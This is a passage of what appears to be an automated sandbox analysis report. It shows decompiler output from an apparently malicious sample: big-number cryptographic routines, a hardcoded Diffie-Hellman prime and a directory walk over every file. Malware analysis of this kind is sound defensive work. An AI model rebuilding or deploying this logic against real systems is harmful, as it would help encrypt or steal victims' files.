    					return E003D6732(_a4, 1);
    				}
    				_t555 = _a20;
    				E003DA694(_a20);
    				_t335 = E003DDF19();
    				_v12 = _t335;
    				__eflags = _t335;
    				if(__eflags == 0) {
    					L130:
    					E003DA6BB(_a20);
    					return _v112;
    				} else {
    					_t339 = L003DDF89(_t473, _t478, 0, __eflags, _t335, _a16, _t555);
    					_t609 = _t608 + 0xc;
    					__eflags = _t339;
    					if(_t339 == 0) {
    						L128:
    						E003DDF5C(_v12);
    						__eflags = _v16;
    						if(_v16 != 0) {
    							memset(_v16, 0, _v68);
    							 *0x3e8540(_v116);
    						}
    						goto L130;
    					}
    					_t343 = _v8;
    					__eflags = _t343 - 0x3a9;
    					if(_t343 <= 0x3a9) {
    						__eflags = _t343 - 0x132;
    						if(_t343 <= 0x132) {
    							__eflags = _t343 - 0x59;
    							if(_t343 <= 0x59) {
    								__eflags = _t343 - 0x16;
    								_t21 = _t343 - 0x16 > 0;
    								__eflags = _t21;
    								_v24 = (0 | _t21) + (0 | _t21) + 1;
    							} else {
    								_v24 = 4;
    							}
    						} else {
    							_v24 = 5;
    						}
    					} else {
    						_v24 = 6;
    					}
    					_t589 = 1 << _v24;
    					_t344 = _t473 + _t473;
    					_v20 = 1;
    					__eflags = _t344 - 1;
    					if(_t344 <= 1) {
    						_t344 = 1;
    					}
    					_t590 = _t589 * _t473;
    					_t346 = _t344 + _t590 << 2;
    					_v68 = _t346;
    					_t348 =  *0x3e8538(_t346 + 0x40);
    					_v116 = _t348;
    					__eflags = _t348;
    					if(__eflags == 0) {
    						goto L128;
    					} else {
    						_t560 = _t348 - (_t348 & 0x0000003f) + 0x40;
    						_v16 = _t560;
    						memset(_t560, 0, _v68);
    						_t561 = _t560 + _t590 * 4;
    						_v108 = _t561 + _t473 * 4;
    						_push(2);
    						_v104 = 0;
    						_v84 = 0;
    						_v96 = 0;
    						_v76 = 0;
    						_v92 = 0;
    						_v72 = 0;
    						_v88 = _t561;
    						_t562 = _v12 + 4;
    						_v100 = _t473;
    						_v80 = _t473;
    						_t356 = E003DDC59(_a20, _t348 & 0x0000003f, _t531, __eflags,  &_v88, "�h>", _t562, _v12);
    						_t609 = _t609 + 0x1c;
    						__eflags = _t356;
    						if(_t356 == 0) {
    							goto L128;
    						}
    						_t591 = _a8;
    						_t474 = _a16;
    						_t486 = 0;
    						__eflags =  *(_t591 + 0xc);
    						if( *(_t591 + 0xc) != 0) {
    							L34:
    							_t357 =  *(_t591 + 4);
    							_v32 = _t486;
    							__eflags = _t357 - _t486;
    							if(_t357 <= _t486) {
    								L36:
    								__eflags =  *(_t591 + 0x10) & 0x00000004;
    								if(( *(_t591 + 0x10) & 0x00000004) != 0) {
    									L38:
    									_v32 = 1;
    									L39:
    									__eflags =  *((intOrPtr*)(_t474 + 4)) - _t486;
    									if( *((intOrPtr*)(_t474 + 4)) == _t486) {
    										goto L128;
    									}
    									__eflags = _v32 - _t486;
    									if(_v32 != _t486) {
    										L44:
    										_t592 = _a20;
    										E003DA694(_a20);
    										_v56 = E003DA715(_a20);
    										_t475 = E003DA715(_a20);
    										_t564 = E003DA715(_a20);
    										_v48 = _t564;
    										_t366 = E003DA715(_t592);
    										__eflags = _v56;
    										_v44 = _t366;
    										if(_v56 == 0) {
    											L118:
    											E003DA6BB(_a20);
    											goto L128;
    										}
    										__eflags = _t475;
    										if(_t475 == 0) {
    											goto L118;
    										}
    										__eflags = _t564;
    										if(_t564 == 0) {
    											goto L118;
    										}
    										__eflags = _t366;
    										if(_t366 == 0) {
    											goto L118;
    										}
    										_t532 = _a16;
    										_t370 = E003D6518(_a16) & 0x8000001f;
    										__eflags = _t370;
    										if(_t370 < 0) {
    											_t370 = (_t370 - 0x00000001 | 0xffffffe0) + 1;
    											__eflags = _t370;
    										}
    										_t593 = 0x20;
    										_t594 = _t593 - _t370;
    										_t371 = E003DA920(_t532, _t564, _t532, _t594);
    										_t609 = _t609 + 0xc;
    										__eflags = _t371;
    										if(_t371 == 0) {
    											goto L118;
    										} else {
    											 *(_t564 + 0xc) =  *(_t564 + 0xc) & 0x00000000;
    											_v156 = _t594 + 0x20;
    											_t372 = E003DA920(_t532, _t475, _a8, _t594 + 0x20);
    											_t609 = _t609 + 0xc;
    											__eflags = _t372;
    											if(_t372 == 0) {
    												goto L118;
    											}
    											 *(_t475 + 0xc) =  *(_t475 + 0xc) & 0x00000000;
    											__eflags = _v32;
    											if(_v32 == 0) {
    												L67:
    												_t487 = _v48;
    												_t596 =  *(_t487 + 4);
    												_t373 =  *_t475;
    												_t488 =  *_t487;
    												_v128 = _v128 & 0x00000000;
    												_t566 =  *(_t475 + 4) - _t596;
    												_v140 = _t373 + _t566 * 4;
    												_v132 =  *((intOrPtr*)(_t475 + 8)) - _t566;
    												_v124 =  *(_t475 + 0x10) | 0x00000002;
    												_t538 =  *(_t488 + _t596 * 4 - 4);
    												_v60 = _t596;
    												_v28 = _t566;
    												_v136 = _t596;
    												_v52 =  *(_t488 + _t596 * 4 - 4);
    												__eflags = _t596 - 1;
    												if(_t596 != 1) {
    													_v64 =  *((intOrPtr*)(_t488 + _t596 * 4 - 8));
    												} else {
    													_v64 = _v64 & 0x00000000;
    												}
    												_v40 = _t373 +  *(_t475 + 4) * 4 - 4;
    												_t492 = _v44;
    												 *(_t492 + 0xc) =  *(_a16 + 0xc) ^  *(_a8 + 0xc);
    												_t378 = _t566 + 1;
    												__eflags = _t378 -  *((intOrPtr*)(_t492 + 8));
    												if(_t378 >  *((intOrPtr*)(_t492 + 8))) {
    													_t379 = E003D665B(_t378, _v44);
    													_t596 = _v60;
    													_t566 = _v28;
    												} else {
    													_t379 = _t492;
    												}
    												__eflags = _t379;
    												if(_t379 == 0) {
    													goto L118;
    												} else {
    													_t380 = _v44;
    													 *((intOrPtr*)(_t380 + 4)) = _t566 - _v32;
    													_t495 = _v56;
    													_a16 =  *_t380 + _t566 * 4 - 4;
    													_t383 = _t596 + 1;
    													_v120 = _t383;
    													__eflags = _t383 -  *((intOrPtr*)(_t495 + 8));
    													if(_t383 >  *((intOrPtr*)(_t495 + 8))) {
    														_t384 = E003D665B(_v120, _v56);
    														_t596 = _v60;
    														_t566 = _v28;
    													} else {
    														_t384 = _t495;
    													}
    													__eflags = _t384;
    													if(_t384 == 0) {
    														goto L118;
    													} else {
    														__eflags = _v32;
    														if(_v32 == 0) {
    															_t538 = _v48;
    															_t448 = E003D687A( &_v140, _v48);
    															__eflags = _t448;
    															if(_t448 < 0) {
    																_t449 = _v44;
    																_t217 = _t449 + 4;
    																 *_t217 =  *(_t449 + 4) - 1;
    																__eflags =  *_t217;
    															} else {
    																_t538 =  *_v48;
    																E003D70EC(_v140, _v140,  *_v48, _t596);
    																 *_a16 = 1;
    															}
    														}
    														_t385 = _v44;
    														__eflags =  *(_t385 + 4);
    														if( *(_t385 + 4) != 0) {
    															_t223 =  &_a16;
    															 *_t223 = _a16 - 4;
    															__eflags =  *_t223;
    														} else {
    															 *(_t385 + 0xc) =  *(_t385 + 0xc) & 0x00000000;
    														}
    														_t569 = _t566 - 1;
    														__eflags = _t569;
    														if(_t569 <= 0) {
    															L106:
    															_t386 =  *(_t475 + 4);
    															__eflags = _t386;
    															if(_t386 <= 0) {
    																L110:
    																_t599 =  *(_a8 + 0xc);
    																E003DAA38(_v156, _t475, _t538,  &_v108);
    																_pop(_t486);
    																__eflags = _v104;
    																if(_v104 != 0) {
    																	_v96 = _t599;
    																}
    																__eflags = _v32;
    																if(_v32 == 0) {
    																	L117:
    																	E003DA6BB(_a20);
    																	L43:
    																	_t393 = _v12;
    																	_push(_t393);
    																	_push(_t393 + 4);
    																	_push( &_v108);
    																	L20:
    																	_push( &_v108);
    																	_t398 = E003DDC59(_a20, _t486, _t538, __eflags);
    																	_t609 = _t609 + 0x10;
    																	__eflags = _t398;
    																	if(_t398 == 0) {
    																		goto L128;
    																	}
    																	_t399 = E003DD3E7(_v36,  &_v88, _v16, 0, _v20);
    																	_t609 = _t609 + 0xc;
    																	__eflags = _t399;
    																	if(_t399 == 0) {
    																		goto L128;
    																	}
    																	_t540 = _v36;
    																	_t601 =  &_v108;
    																	_t400 = E003DD3E7(_v36,  &_v108, _v16, 1, _v20);
    																	_t609 = _t609 + 0xc;
    																	__eflags = _t400;
    																	if(_t400 == 0) {
    																		goto L128;
    																	}
    																	__eflags = _v24 - 1;
    																	if(__eflags <= 0) {
    																		L30:
    																		_v8 = _v8 - 1;
    																		_t401 = _v8;
    																		asm("cdq");
    																		_t541 = _t401 % _v24;
    																		_t602 = 0;
    																		_t571 = _t401 % _v24;
    																		__eflags = _t571;
    																		if(_t571 < 0) {
    																			L32:
    																			_t497 =  &_v88;
    																			_t404 = E003DD41A(_v36,  &_v88, _v16, _t602, _v20);
    																			_t609 = _t609 + 0xc;
    																			while(1) {
    																				__eflags = _t404;
    																				if(_t404 == 0) {
    																					goto L128;
    																				}
    																				_t572 = 0;
    																				__eflags = _v8;
    																				if(__eflags >= 0) {
    																					_t603 = 0;
    																					__eflags = _v24;
    																					if(__eflags <= 0) {
    																						L122:
    																						_t497 =  &_v108;
    																						_t406 = E003DD41A(_v36,  &_v108, _v16, _t603, _v20);
    																						_t609 = _t609 + 0xc;
    																						__eflags = _t406;
    																						if(__eflags == 0) {
    																							goto L128;
    																						}
    																						_t404 = E003DDC59(_a20,  &_v108, _t541, __eflags,  &_v88,  &_v88,  &_v108, _v12);
    																						_t609 = _t609 + 0x10;
    																						continue;
    																					} else {
    																						goto L120;
    																					}
    																					while(1) {
    																						L120:
    																						_t412 = E003DDC59(_a20, _t497, _t541, __eflags,  &_v88,  &_v88,  &_v88, _v12);
    																						_t609 = _t609 + 0x10;
    																						__eflags = _t412;
    																						if(_t412 == 0) {
    																							goto L128;
    																						}
    																						_t413 = E003D691C(_a12, _t541, _v8);
    																						_t572 = _t572 + 1;
    																						_v8 = _v8 - 1;
    																						_pop(_t497);
    																						_t603 = _t413 + _t603 * 2;
    																						__eflags = _t572 - _v24;
    																						if(__eflags < 0) {
    																							continue;
    																						}
    																						goto L122;
    																					}
    																					goto L128;
    																				}
    																				_t416 = E003DDECF(_a20, _t497, __eflags, _a4,  &_v88, _v12);
    																				_t609 = _t609 + 0xc;
    																				__eflags = _t416;
    																				if(_t416 != 0) {
    																					_v112 = 1;
    																				}
    																				goto L128;
    																			}
    																			goto L128;
    																		} else {
    																			goto L31;
    																		}
    																		do {
    																			L31:
    																			_t417 = E003D691C(_a12, _t541, _v8);
    																			_v8 = _v8 - 1;
    																			_t571 = _t571 - 1;
    																			__eflags = _t571;
    																			_t602 = _t417 + _t602 * 2;
    																		} while (_t571 >= 0);
    																		goto L32;
    																	}
    																	_t421 = E003DDC59(_a20, _t486, _t540, __eflags,  &_v88,  &_v108, _t601, _v12);
    																	_t609 = _t609 + 0x10;
    																	__eflags = _t421;
    																	if(_t421 == 0) {
    																		goto L128;
    																	}
    																	_t542 = _v36;
    																	_t422 = E003DD3E7(_v36,  &_v88, _v16, 2, _v20);
    																	_t609 = _t609 + 0xc;
    																	__eflags = _t422;
    																	if(_t422 == 0) {
    																		goto L128;
    																	}
    																	_t573 = 3;
    																	__eflags = _v20 - _t573;
    																	if(__eflags <= 0) {
    																		goto L30;
    																	} else {
    																		goto L27;
    																	}
    																	while(1) {
    																		L27:
    																		_t427 = E003DDC59(_a20, _t486, _t542, __eflags,  &_v88,  &_v108,  &_v88, _v12);
    																		_t609 = _t609 + 0x10;
    																		__eflags = _t427;
    																		if(_t427 == 0) {
    																			goto L128;
    																		}
    																		_t542 = _v36;
    																		_t428 = E003DD3E7(_v36,  &_v88, _v16, _t573, _v20);
    																		_t609 = _t609 + 0xc;
    																		__eflags = _t428;
    																		if(_t428 == 0) {
    																			goto L128;
    																		}
    																		_t573 = _t573 + 1;
    																		__eflags = _t573 - _v20;
    																		if(__eflags < 0) {
    																			continue;
    																		}
    																		goto L30;
    																	}
    																	goto L128;
    																} else {
    																	_t429 = _v44;
    																	_t486 =  *(_t429 + 4);
    																	__eflags = _t486;
    																	if(_t486 <= 0) {
    																		goto L117;
    																	}
    																	_t501 =  *_t429 + _t486 * 4 - 4;
    																	while(1) {
    																		_t538 =  *_t501;
    																		_t486 = _t501 - 4;
    																		__eflags =  *_t501;
    																		if( *_t501 != 0) {
    																			goto L117;
    																		}
    																		 *(_t429 + 4) =  *(_t429 + 4) - 1;
    																		__eflags =  *(_t429 + 4);
    																		if( *(_t429 + 4) > 0) {
    																			continue;
    																		}
    																		goto L117;
    																	}
    																	goto L117;
    																}
    															}
    															_t430 =  *_t475 + _t386 * 4 - 4;
    															while(1) {
    																_t503 =  *_t430;
    																_t430 = _t430 - 4;
    																__eflags = _t503;
    																if(_t503 != 0) {
    																	goto L110;
    																}
    																 *(_t475 + 4) =  *(_t475 + 4) - 1;
    																__eflags =  *(_t475 + 4);
    																if( *(_t475 + 4) > 0) {
    																	continue;
    																}
    																goto L110;
    															}
    															goto L110;
    														} else {
    															_t432 = _a16 - _v40;
    															__eflags = _t432;
    															_v60 = _t569;
    															_v148 = _t432;
    															do {
    																_t504 = _v40;
    																_t433 =  *_t504;
    																_t574 =  *((intOrPtr*)(_t504 - 4));
    																__eflags =  *_t504 - _v52;
    																if( *_t504 != _v52) {
    																	_t434 = E003D6F02(_t433, _t574, _v52);
    																	_v144 = _t574 - _t434 * _v52;
    																	_a16 = _t434;
    																	_t435 = _v64;
    																	_t544 = _t435 & 0x0000ffff;
    																	_v28 = _t434 & 0x0000ffff;
    																	_t577 = _t434 >> 0x10;
    																	_t436 = _t435 >> 0x10;
    																	_t545 = _t544 * _v28;
    																	_v152 = _t577;
    																	_t437 = _t436 * _v152;
    																	_t579 = _t436 * _v28;
    																	_t512 = _t544 * _t577 + _t579;
    																	_v28 = _t579;
    																	__eflags = _t512 - _t579;
    																	if(_t512 < _t579) {
    																		_t437 = _t437 + 0x10000;
    																		__eflags = _t437;
    																	}
    																	_t513 = _t512 << 0x10;
    																	_t546 = _t545 + _t513;
    																	_t438 = _t437 + (_t512 >> 0x10);
    																	__eflags = _t546 - _t513;
    																	if(_t546 < _t513) {
    																		_t438 = _t438 + 1;
    																		__eflags = _t438;
    																	}
    																	_t514 = _v144;
    																	while(1) {
    																		__eflags = _t438 - _t514;
    																		if(__eflags < 0) {
    																			break;
    																		}
    																		if(__eflags != 0) {
    																			L96:
    																			_t514 = _t514 + _v52;
    																			_a16 = _a16 - 1;
    																			__eflags = _t514 - _v52;
    																			if(_t514 < _v52) {
    																				break;
    																			}
    																			__eflags = _t546 - _v64;
    																			if(_t546 < _v64) {
    																				_t438 = _t438 - 1;
    																				__eflags = _t438;
    																			}
    																			_t546 = _t546 - _v64;
    																			__eflags = _t546;
    																			continue;
    																		}
    																		_t583 = _v40;
    																		__eflags = _t546 -  *((intOrPtr*)(_t583 - 8));
    																		if(_t546 <=  *((intOrPtr*)(_t583 - 8))) {
    																			break;
    																		}
    																		goto L96;
    																	}
    																	L101:
    																	_t582 = _v48;
    																	_t440 = E003D6BFB( *_v48,  *_v56, _t596);
    																	_v140 = _v140 - 4;
    																	 *((intOrPtr*)( *_v56 + _t596 * 4)) = _t440;
    																	_t442 = E003D70EC(_v140, _v140,  *_v56, _v120);
    																	__eflags = _t442;
    																	if(_t442 == 0) {
    																		L104:
    																		_t443 = _v40;
    																		goto L105;
    																	}
    																	_a16 = _a16 - 1;
    																	_t446 = E003D6FFC( *_t582, _v140, _v140, _t596);
    																	__eflags = _t446;
    																	if(_t446 == 0) {
    																		goto L104;
    																	}
    																	_t443 = _v40;
    																	 *_t443 =  *_t443 + 1;
    																	goto L105;
    																}
    																_a16 = _a16 | 0xffffffff;
    																goto L101;
    																L105:
    																_t538 = _a16;
    																 *(_t443 + _v148) = _a16;
    																_t272 =  &_v60;
    																 *_t272 = _v60 - 1;
    																__eflags =  *_t272;
    																_v40 = _t443 - 4;
    															} while ( *_t272 != 0);
    															goto L106;
    														}
    													}
    												}
    											}
    											_t454 =  *((intOrPtr*)(_t564 + 4));
    											_t525 =  *(_t475 + 4);
    											__eflags = _t525 - _t454 + 1;
    											if(_t525 > _t454 + 1) {
    												_t584 = _t525 + 1;
    												__eflags = _t525 + 1 -  *((intOrPtr*)(_t475 + 8));
    												if(_t525 + 1 >  *((intOrPtr*)(_t475 + 8))) {
    													_t455 = E003D665B(_t584, _t475);
    												} else {
    													_t455 = _t475;
    												}
    												__eflags = _t455;
    												if(_t455 == 0) {
    													goto L118;
    												} else {
    													 *( *_t475 +  *(_t475 + 4) * 4) =  *( *_t475 +  *(_t475 + 4) * 4) & 0x00000000;
    													_t152 = _t475 + 4;
    													 *_t152 =  *(_t475 + 4) + 1;
    													__eflags =  *_t152;
    													goto L67;
    												}
    											}
    											_t457 = _t454 + 2;
    											__eflags = _t457 -  *((intOrPtr*)(_t475 + 8));
    											if(_t457 >  *((intOrPtr*)(_t475 + 8))) {
    												_t458 = E003D665B(_t457, _t475);
    												_t564 = _v48;
    											} else {
    												_t458 = _t475;
    											}
    											__eflags = _t458;
    											if(_t458 == 0) {
    												goto L118;
    											} else {
    												_t459 =  *(_t475 + 4);
    												while(1) {
    													__eflags = _t459 -  *((intOrPtr*)(_t564 + 4)) + 2;
    													if(_t459 >=  *((intOrPtr*)(_t564 + 4)) + 2) {
    														break;
    													}
    													 *( *_t475 + _t459 * 4) =  *( *_t475 + _t459 * 4) & 0x00000000;
    													_t459 = _t459 + 1;
    													__eflags = _t459;
    												}
    												 *(_t475 + 4) =  *((intOrPtr*)(_t564 + 4)) + 2;
    												goto L67;
    											}
    										}
    									}
    									_t538 = _t474;
    									_t465 = E003D687A(_t591, _t474);
    									__eflags = _t465;
    									if(_t465 >= 0) {
    										goto L44;
    									}
    									_t467 = E003D669B(_t486,  &_v108, _t591);
    									_pop(_t486);
    									__eflags = _t467;
    									if(__eflags == 0) {
    										goto L128;
    									}
    									goto L43;
    								}
    								__eflags =  *(_t474 + 0x10) & 0x00000004;
    								if(( *(_t474 + 0x10) & 0x00000004) == 0) {
    									goto L39;
    								}
    								goto L38;
    							}
    							_t553 =  *_t591;
    							__eflags =  *((intOrPtr*)(_t553 + _t357 * 4 - 4)) - _t486;
    							if( *((intOrPtr*)(_t553 + _t357 * 4 - 4)) == _t486) {
    								goto L128;
    							}
    							goto L36;
    						}
    						_t538 = _t474;
    						__eflags = E003D687A(_t591, _t474);
    						if(__eflags >= 0) {
    							_t486 = 0;
    							__eflags = 0;
    							goto L34;
    						}
    						_push(_v12);
    						_push(_t562);
    						_push(_t591);
    						goto L20;
    					}
    				}
    			}

    APIs
    • memset.MSVCRT ref: 003DD588
      • Part of subcall function 003DA920: memset.MSVCRT ref: 003DAA03
      • Part of subcall function 003D665B: memset.MSVCRT ref: 003D6682
    • memset.MSVCRT ref: 003DDC38
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 87%
    			E003DF261(void* __ecx, BYTE* _a4) {
    				int _v8;
    				char* _t6;
    				signed int _t8;
    				char* _t12;
    				char _t13;
    				char* _t16;
    
    				_t12 = "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF";
    				_t6 = _t12;
    				_v8 = 0x80;
    				_t16 =  &(_t6[1]);
    				do {
    					_t13 =  *_t6;
    					_t6 =  &(_t6[1]);
    				} while (_t13 != 0);
    				_t8 = CryptStringToBinaryA(_t12, _t6 - _t16, 4, _a4,  &_v8, 0, 0);
    				asm("sbb eax, eax");
    				return  ~_t8 & _v8;
    			}

    APIs
    • CryptStringToBinaryA.CRYPT32(FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF,FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF,00000004,00000000,00000080,00000000,00000000), ref: 003DF28F
    Strings
    • FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF, xrefs: 003DF265, 003DF28D, 003DF28E
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 72%
    			E003C2450(intOrPtr _a4, signed int* _a8) {
    				signed int _v8;
    				intOrPtr _v12;
    				char _v536;
    				char _v736;
    				char _v1284;
    				signed int _v1328;
    				intOrPtr* _t49;
    				signed int _t50;
    				intOrPtr _t52;
    				intOrPtr _t54;
    				signed int _t55;
    				intOrPtr _t57;
    				signed int _t62;
    				signed int _t65;
    				signed int _t69;
    				long _t70;
    				signed int _t72;
    				signed int _t73;
    				signed int _t74;
    				void* _t78;
    				intOrPtr _t80;
    				intOrPtr _t86;
    				intOrPtr _t88;
    				intOrPtr _t93;
    				signed int _t96;
    				signed int _t97;
    				void* _t98;
    				void* _t99;
    				void* _t101;
    
    				_t86 =  *0x3e8628; // 0x622508
    				_t97 = 0;
    				_push(0);
    				_push( &_v536);
    				_push(0x105);
    				_push(_a4);
    				_t96 = 0;
    				_v8 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x10))))() == 0) {
    					L22:
    					E003CBB40(_t97);
    					 *_a8 = 0;
    					return 0;
    				} else {
    					_t88 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t88 + 0x1d8))))( &_v536);
    					_t78 = 0x105;
    					_t49 =  &_v536;
    					while( *_t49 != _t97) {
    						_t49 = _t49 + 2;
    						_t78 = _t78 - 1;
    						if(_t78 != 0) {
    							continue;
    						} else {
    							goto L22;
    						}
    						goto L24;
    					}
    					__eflags = _t78 - _t97;
    					if(_t78 == _t97) {
    						goto L22;
    					} else {
    						_t72 = 0x105 - _t78;
    						_t50 = E003D1C50( &_v536, 0x105, L"*.*");
    						__eflags = _t50;
    						if(_t50 < 0) {
    							goto L22;
    						} else {
    							_t80 =  *0x3e8628; // 0x622508
    							_t52 =  *((intOrPtr*)( *((intOrPtr*)(_t80 + 0x14))))( &_v536,  &_v1328);
    							_v12 = _t52;
    							__eflags = _t52 - 0xffffffff;
    							if(_t52 == 0xffffffff) {
    								goto L22;
    							} else {
    								__eflags = 0;
    								 *((short*)(_t98 + _t72 * 2 - 0x214)) = 0;
    								do {
    									__eflags = _v1328 & 0x00000010;
    									if((_v1328 & 0x00000010) != 0) {
    										goto L16;
    									} else {
    										_t96 = _t96 + 1;
    										_t73 = _t96 * 4;
    										_t97 = E003D1D90(_t73, _t97);
    										_t99 = _t99 + 8;
    										__eflags = _t97;
    										if(_t97 != 0) {
    											_t62 = E003D1D90(0x208, 0);
    											_t99 = _t99 + 8;
    											 *(_t73 + _t97 - 4) = _t62;
    											__eflags = _t62;
    											if(__eflags != 0) {
    												E003C9090(__eflags,  &_v736, 0x73);
    												_push( &_v1284);
    												_t65 = E003D0C10( *(_t73 + _t97 - 4), 0x105,  &_v736,  &_v536);
    												_t99 = _t99 + 0x1c;
    												__eflags = _t65;
    												if(_t65 < 0) {
    													_t96 = _t96 - 1;
    													_t74 = _t96 * 4;
    													E003CBB40( *((intOrPtr*)(_t74 + _t97)));
    													_t101 = _t99 + 4;
    													_push(_t97);
    													__eflags = _t96;
    													if(_t96 == 0) {
    														E003CBB40();
    														_t99 = _t101 + 4;
    														_t97 = 0;
    														__eflags = 0;
    													} else {
    														_push(_t74);
    														_t69 = E003D1D90();
    														_t99 = _t101 + 8;
    														_t97 = _t69;
    													}
    												}
    												goto L16;
    											}
    										}
    									}
    									L19:
    									_t57 =  *0x3e8628; // 0x622508
    									 *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x34))))(_v12);
    									__eflags = _v8;
    									if(_v8 != 0) {
    										 *_a8 = _t96;
    										return _t97;
    									} else {
    										__eflags = _t96;
    										while(_t96 != 0) {
    											_t93 =  *((intOrPtr*)(_t97 + _t96 * 4 - 4));
    											_t96 = _t96 - 1;
    											E003CBB40(_t93);
    											_t99 = _t99 + 4;
    											__eflags = _t96;
    										}
    										goto L22;
    									}
    									goto L24;
    									L16:
    									_t54 =  *0x3e8628; // 0x622508
    									_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x40))))(_v12,  &_v1328);
    									__eflags = _t55;
    								} while (_t55 != 0);
    								_t70 = GetLastError();
    								__eflags = _t70 - 0x12;
    								if(_t70 == 0x12) {
    									_v8 = 1;
    								}
    								goto L19;
    							}
    						}
    					}
    				}
    				L24:
    			}

    APIs
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
      • Part of subcall function 003D0C10: _vsnwprintf.MSVCRT ref: 003D0C42
    • GetLastError.KERNEL32 ref: 003C25DD
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 15%
    			E003D39C0(intOrPtr _a4, intOrPtr* _a8) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr* _t53;
    				unsigned char _t64;
    				intOrPtr _t81;
    				char _t82;
    				void* _t83;
    				int _t84;
    				signed int _t85;
    				void* _t88;
    				signed int _t89;
    				intOrPtr* _t91;
    				intOrPtr _t92;
    				signed int _t94;
    				signed char _t98;
    				void* _t117;
    				void* _t118;
    				void* _t119;
    				void* _t121;
    				signed int _t123;
    				signed int _t124;
    				signed int _t126;
    				signed int _t127;
    				signed int* _t128;
    				signed int _t129;
    				signed int* _t130;
    				signed int _t131;
    				signed int* _t132;
    				signed int _t133;
    				signed int* _t134;
    				signed int _t135;
    
    				_push(_t87);
    				_t53 = _a8;
    				_t88 = _t53 + 1;
    				do {
    					_t92 =  *_t53;
    					_t53 = _t53 + 1;
    				} while (_t92 != 0);
    				_t84 = _t53 - _t88;
    				_t123 = _t84 * 5;
    				_v12 = _t123;
    				_t119 =  *0x3e8538(_t84, _t118, _t121, _t83);
    				memset(_t119, 0, _t84);
    				_v8 = _v8 & 0x00000000;
    				if(_t84 == 0) {
    					L14:
    					_t89 = 0;
    					_t85 = 0;
    					if(_t123 == 0) {
    						L29:
    						_t124 = _t89;
    						L22:
    						 *0x3e8540(_t119);
    						return _t124;
    					} else {
    						goto L15;
    					}
    					do {
    						L15:
    						_t126 = 0x28;
    						_t94 = _t85 % _t126;
    						if(_t94 == 0) {
    							_t127 = 5;
    							_t128 = _t119 + _t85 / _t127;
    							_t64 = _t128[0] >> 2;
    							_t98 =  *_t128 << 3;
    							L27:
    							 *((char*)(_t89 + _a4)) = _t64 + _t98;
    							goto L28;
    						}
    						if(_t94 == 8) {
    							_t129 = 5;
    							_t130 = _t119 + _t85 / _t129;
    							_t64 = ( *_t130 << 5) + _t130[0] + ( *_t130 << 5) + _t130[0];
